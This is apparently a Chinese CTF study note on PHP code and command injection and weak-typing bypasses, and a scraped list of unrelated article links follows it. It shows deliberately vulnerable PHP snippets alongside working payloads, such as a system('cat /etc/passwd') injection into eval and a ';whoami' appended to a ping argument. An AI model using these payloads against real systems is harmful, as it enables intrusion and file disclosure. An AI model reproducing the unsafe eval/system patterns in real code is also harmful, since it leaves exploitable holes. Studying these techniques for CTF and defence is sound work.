CODE/COMMAND INJECTION

CODE INJECTION

https://www.freebuf.com/sectool/168653.html

EXAMPLE1

<?php

$str = “echo \”hello “. $GET_[‘name’].”!!!\”;”;      .是连接  双引号注意就近。  

Eval($str);          \”双引号转义 因为echo  内容需要是字符串

?>

注意单引号双引号区别

%22.system(%27ls%27);//   输入,替换了$GET_[‘name’]

%22 :   “

%27: ‘

<?php

$str = “echo \”hello “. %22.system(%27ls%27);//.”!!!\”;”;    

Eval($str);

?>

‘.cat /etc/passwd’

%22.system(‘cat  /etc/passwd’);//   失败

%22.system(%27cat  /etc/passwd%27);//     成功

COMMAND INJECTION

Example 1

<?php

System(‘ping –c $_GET[‘ip’]’ );

?>

127.0.0.1;whoami

PHP 弱类型

= ==

strcmp()

<?php

    if (isset($_GET['value'])) {

    if (strcmp($_GET['value'], $flag) == 0)

        die('Flag is: '.$flag);

    else print 'Flag is not here !';

}

?>

Strcmp= s1-s2

参数是两个数组,输入数组则错误,判断相等

Urlcode 二次编码绕过

/i 不区分大小写

浏览器对用户输入数据自动解码(比如输入 %27)

<?php

    if(preg_match("/hackerDJ/i",$_GET[id])) {

 echo(" not allowed ! ");

 exit();

 }

 $_GET[id] = urldecode($_GET[id]);  //解码

 if($_GET[id] == "hackerDJ") {

  die('Flag is: '.$flag);

 }

?>

对D ,为 %44,再次urlencode,得到 %2544

整数类型大小比较

数组在比较中恒大与具体值

其他类型和整形比较会先 intval()

<?php

$temp = $_GET['id'];

is_numeric($temp) ? die("retry !") : NULL;

if($temp>6607){

    die('Flag is: '.$flag);

} else print 'Flag is not here !';

?> Flag is not here !

Extract 变量覆盖

Extract(array,extract_rules,prefix)

<?php

    $flags='test.txt';

    extract($_GET);

    if(isset($id)) {

        $content=trim(file_get_contents($flags));

    if($id==$content) {

        die('Flag is: '.$flag);

    } else {

    print 'Flag is not here !';

    } }

    ?>

如果输入id=$content

使用extract接收输入,存在变量覆盖,覆盖flags

接收输入后,flags=1,此时

file_get_contents($flags)

取不到文件,故content为空

同时输入id是空。   &是连接符,重新复制flags

输出flag

Intval()

小数取整echo intval(9.999); // 9。最大值取决于操作系统


<?php

    $key = $_GET['key'];

    if(intval($key) > 1||intval($key) < 0){

        die("key is not right");

    }

    elseif (intval($key) < 1) {

        if ($key ==1) {

            die('Flag is: '.$flag);

        }else print 'key is not right !!!';

    } ?> key is not right !!!

Php中弱比较,1==0.999999999999999999999999

比如 echo 1==0.999999999999999999999999  输出1

正则截断

Erge

Php版本小于5.3

遇到%00 默认字符串结束

Preg_match()

Php>=5.3

遇到%00 默认字符串结束


<?php

    if(isset($_GET['password'])){

if(preg_match("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE){

    print('You password not right'); 

} elseif(strlen($_GET['password']) < 8 && $_GET['password'] > 9999999){

    if(strpos($_GET['password'], '*_*') !== FALSE){

     die('Flag is:'.$flag);

} else{

    print('*_* have not been found');

    }

} else{

    print('Invalid password');

    }

}

?>

1e8 >9999999 字符串长度小于8

Eval() 注入

把字符串当做PHP代码执行。只能执行不能回显。

<?php

    if (isset($_GET['id'])) {

    $id = $_GET['id'];

    eval("var_dump($id);");

}

?>

闭合括号,注释掉后面

Md5()弱比较

PHP中 md5对数组加密返回NULL

对所有0e开头(16进制)字符串认为相等

<?php

if (isset($_GET['p1']) && isset($_GET['p2'])) {

    if ($_GET['p1'] != $_GET['p2'] && md5($_GET['p1']) == md5($_GET['p2']))

        die('Flag is: '.$flag);

    else print 'Flag is not here !';

}

?>

输入数组用  ?p1[],多个用 &

Md5()强比较

== 只对值比较,两边先转化为同种类型,若一方为数字另一方为空或null或数组,现将字符串转化为0

=== 比较类型和值

<?php

if (isset($_GET['p1']) && isset($_GET['p2'])) {

    if ($_GET['p1'] != $_GET['p2'] && md5($_GET['p1']) === md5($_GET['p2']))

        die('Flag is: '.$flag);

    else print 'Flag is not here !';

}

?>

Sha()弱比较

对数组加密返回NULL

<?php

if (isset($_GET['name']) and isset($_GET['password'])) {

    if ($_GET['name'] == $_GET['password'])

        echo ' Your password can not be your name! ';

    else if (sha1($_GET['name']) === sha1($_GET['password']))

        die('Flag: '.$flag); else echo ' Invalid password ';

}

else echo 'Flag is not here !';

?> Flag is not here !

Strpos

查找字符串在字符串第一次出现的位置。Strpos(string,find,start)。在string中查找find

<?php

if (isset($_GET['id'])) {

    $one = ord('0');

    $nine = ord('9');

    for($i = 0; $i < strlen($_GET['id']); $i++) {

        $digit = ord($_GET['id']{$i});

        if(($digit < $one) || ($digit > $nine) ) {

            print("必须输入数字才行");

            return FALSE;

            }

        }

    if (strpos($_GET['id'], 'sss607') !== FALSE)

        die('Flag: '.$flag);

    else echo 'flag is not here ~';

}

?>

先判断只有数字

Strpos对数组查找返回NULL,NULL!==flase

Session 验证绕过

Session_start() 用来初始化session或从session仓库加载已经存在的session变量

<?php

@session_start();

print($_SESSION["password"]);

    if ($_GET['password'] == $_SESSION['password'])

        die ('Flag: '.$flag);

    else

        print 'password is not right !';

$_SESSION['password']=rand(10000000,99999999);

?>

系统会判断用户输入的password的值是否与当前session中password值相同。初始时session为空,故输入password为空即可

若直接访问过http://10.201.132.248:8090/13.session/session.php 则session已经存在,不为空。清空缓存或者换浏览器即可

PHP 弱类型 && CODE/COMMADN injection的更多相关文章

  1. MVC 强类型传值Model。和弱类型传值ViewData[&quot;&quot;]。及用EF进行增删查改(母版页的使用)

    <1> 控制器 </pre><pre name="code" class="csharp">using MvcTest.Mo ...

  2. PHP弱类型需要特别注意的问题

    下面介绍的问题都已验证, 总结:字符数据比较==不比较类型,会将字符转数据,字符转数字(转换直到遇到一个非数字的字符.即使出现无法转换的字符串,intval()不会报错而是返回0).0e,0x开头的字 ...

  3. [JS2] JS是弱类型

    <html> <head> <title>JavaScript 是弱类型的</title> <Script Language="Java ...

  4. sqlite 的比较等运算是根据不同的值而不同的,并不是根据的字段类型,因为 sqlite 是弱类型字段

    sqlite 的比较等运算是根据不同的值而不同的,并不是根据的字段类型,因为 sqlite 是弱类型字段   --------------------------------------------- ...

  5. MVC强类型和弱类型的区别

    1 强类型的处理 首先必须要有一个对象的实体类,UserINfo就是一个实体类,如下: public class UserInfo() { public  int Id{set;get;} publi ...

  6. PHP弱类型安全问题的写法和步骤

    鉴于目前PHP是世界上最好的语言,PHP本身的问题也可以算作是web安全的一个方面.在PHP中的特性就是弱类型,以及内置函数对于传入参数的松散处理.本篇文章主要就是记录我在做攻防平台上面遇到的PHP的 ...

  7. Javascript 弱类型:除法结果是小数

    由于javascript是弱类型,只有一种var类型,所以在运算时不会自动强制转换,所以计算的结果是多少就是多少,但java中的17/10的结果就是1(强类型与弱类型)比如:console.log(M ...

  8. 2016年11月3日JS脚本简介数据类型: 1.整型:int 2.小数类型: float(单精度) double(双精度) decimal () 3.字符类型: chr 4.字符串类型:sting 5.日期时间:datetime 6.布尔型数据:bool 7.对象类型:object 8.二进制:binary 语言类型: 1.强类型语言:c++ c c# java 2.弱类型语

    数据类型: 1.整型:int 2.小数类型: float(单精度) double(双精度) decimal () 3.字符类型: chr 4.字符串类型:sting 5.日期时间:datetime 6 ...

  9. 弱类型语言中的0和空字符串(''或"")以及字符串'0'

    在弱类型语言(js/PHP)中, 当我们用==判断0和'0'以及空字符串(''或"")是否相等的时候, 返回的是true. 而且在PHP中, 当我们用==判断0和null是否相等的 ...

随机推荐

  1. bootstrap 后端模板

    Twitter Bootstrap 框架已经广为人知,用于加快网站,应用程序或主题的界面开发,并被公认为是迄今对于 Web 开发的最有实质性帮助的工具之一.在此之前的,各种各样的界面库伴随着高昂的维护 ...

  2. poj 1038 Bugs Integrated, Inc. 题解

    提供一种代码难度比较简单的做法(可能) 状态表示: 设置状态$ f[i][j] $,表示第 \(i\) 行状态为 \(j\) 的最大放置数,因为这是个阴间题,因为题目内存设置很小,所以要用滚动数组,存 ...

  3. Python Pandas操作Excel

    Python Pandas操作Excel 前情提要 ☟ 本章使用的 Python3.6 Pandas==0.25.3 项目中需要用到excel的文件字段太多 考虑到后续字段命名的变动以及中文/英文/日 ...

  4. Python編碼格式錯誤解決方案及案例

    Python格式錯誤解決方案及案例 這幾天在玩爬蟲,在解析和提取内容時經常出現由於内容格式問題導致出錯,為防止以後出錯,整下一下,以下是這幾天的總結: 1. 特殊符號或表情符號等 背景:爬取一個烹飪教 ...

  5. spark开窗函数

    源文件内容示例: http://bigdata.beiwang.cn/laoli http://bigdata.beiwang.cn/laoli http://bigdata.beiwang.cn/h ...

  6. 当中台遇上DDD,我们该如何设计微服务? - InfoQ https://www.infoq.cn/article/7QgXyp4Jh3-5Pk6LydWw

    当中台遇上DDD,我们该如何设计微服务? - InfoQ https://www.infoq.cn/article/7QgXyp4Jh3-5Pk6LydWw

  7. super 多重继承 super() function with multilevel inheritance

    Python | super() function with multilevel inheritance - GeeksforGeeks https://www.geeksforgeeks.org/ ...

  8. Java——入门“HelloWorld”

    //Java程序的结构 //下面这个:外层框架 public class HellloWorld { // Java入口程序框架 //类名与文件名完全一样 public static void mai ...

  9. Java——StringBuffer,String总结

    StringBuffer介绍: Java StringBuffer和StringBuilder类 当对字符串进行修改的时候,需要使用StringBuffer和StringBuilder类. Strin ...

  10. Spark练习之创建RDD(集合、本地文件),RDD持久化及RDD持久化策略

    Spark练习之创建RDD(集合.本地文件) 一.创建RDD 二.并行化集合创建RDD 2.1 Java并行创建RDD--计算1-10的累加和 2.2 Scala并行创建RDD--计算1-10的累加和 ...